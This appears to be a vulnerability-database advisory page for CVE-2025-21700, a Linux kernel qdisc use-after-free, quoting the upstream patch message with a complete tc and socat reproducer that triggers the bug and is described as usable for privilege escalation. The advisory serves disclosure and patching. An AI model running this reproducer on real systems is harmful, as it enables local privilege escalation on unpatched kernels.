🛡️ AZL-59079 — kernel

⚪ Unknown ✅ No Known Exploit OSV
N/A
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

CVE-2025-21700 affecting package kernel for versions less than 5.15.180.1-1

In the Linux kernel, the following vulnerability has been resolved:

net: sched: Disallow replacing of child qdisc from one parent to another

Lion Ackermann was able to create a UAF which can be abused for privilege

escalation with the following script

Step 1. create root qdisc

tc qdisc add dev lo root handle 1:0 drr

step2. a class for packet aggregation do demonstrate uaf

tc class add dev lo classid 1:1 drr

step3. a class for nesting

tc class add dev lo classid 1:2 drr

step4. a class to graft qdisc to

tc class add dev lo classid 1:3 drr

step5.

tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024

step6.

tc qdisc add dev lo parent 1:2 handle 3:0 drr

step7.

tc class add dev lo classid 3:1 drr

step 8.

tc qdisc add dev lo parent 3:1 handle 4:0 pfifo

step 9. Display the class/qdisc layout

tc class ls dev lo

class drr 1:1 root leaf 2: quantum 64Kb

class drr 1:2 root leaf 3: quantum 64Kb

class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls

qdisc drr 1: dev lo root refcnt 2

qdisc plug 2: dev lo parent 1:1

qdisc pfifo 4: dev lo parent 3:1 limit 1000p

qdisc drr 3: dev lo parent 1:2

step10. trigger the bug <=== prevented by this patch

tc qdisc replace dev lo parent 1:3 handle 4:0

step 11. Redisplay again the qdiscs/classes

tc class ls dev lo

class drr 1:1 root leaf 2: quantum 64Kb

class drr 1:2 root leaf 3: quantum 64Kb

class drr 1:3 root leaf 4: quantum 64Kb

class drr 3:1 root leaf 4: quantum 64Kb

tc qdisc ls

qdisc drr 1: dev lo root refcnt 2

qdisc plug 2: dev lo parent 1:1

qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p

qdisc drr 3: dev lo parent 1:2

Observe that a) parent for 4:0 does not change despite the replace request.

There can only be one parent. b) refcount has gone up by two for 4:0 and

c) both class 1:3 and 3:1 are pointing to it.

Step 12. send one packet to plug

echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

step13. send one packet to the grafted fifo

echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))

step14. lets trigger the uaf

tc class delete dev lo classid 1:3

tc class delete dev lo classid 1:1

The semantics of "replace" is for a del/add _on the same node_ and not

a delete from one node(3:1) and add to another node (1:3) as in step10.

While we could "fix" with a more complex approach there could be

consequences to expectations so the patch takes the preventive approach of

"disallow such config".

Joint work with Lion Ackermann <[email protected]>

Affected software

AZL-59079 is recorded against 1 package.

  • kernel (fixed in 5.15.180.1-1)

Timeline and source

Published on 13 February 2025 and last revised on 21 April 2026. No public exploit is currently recorded for this entry. Record sourced from OSV.

References

nvd.nist.gov (Web)

Details

Severity Unknown
CVSS Score N/A
CVSS Vector N/A
CWE N/A
Public Exploit ✅ No
Source OSV
Published 2025-02-13
Updated 2026-08-12
Modified 2026-04-21
Fix URL N/A

Affected Packages

Software From version Fixed in
kernel 5.15.180.1-1

Similar Threats

Free Vulnerability Check

Is your site affected by AZL-59079?

BotEraser helps you identify potentially vulnerable plugins and themes by checking your installation against AZL-59079 and other known CVE records.

Scan My Site Free →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.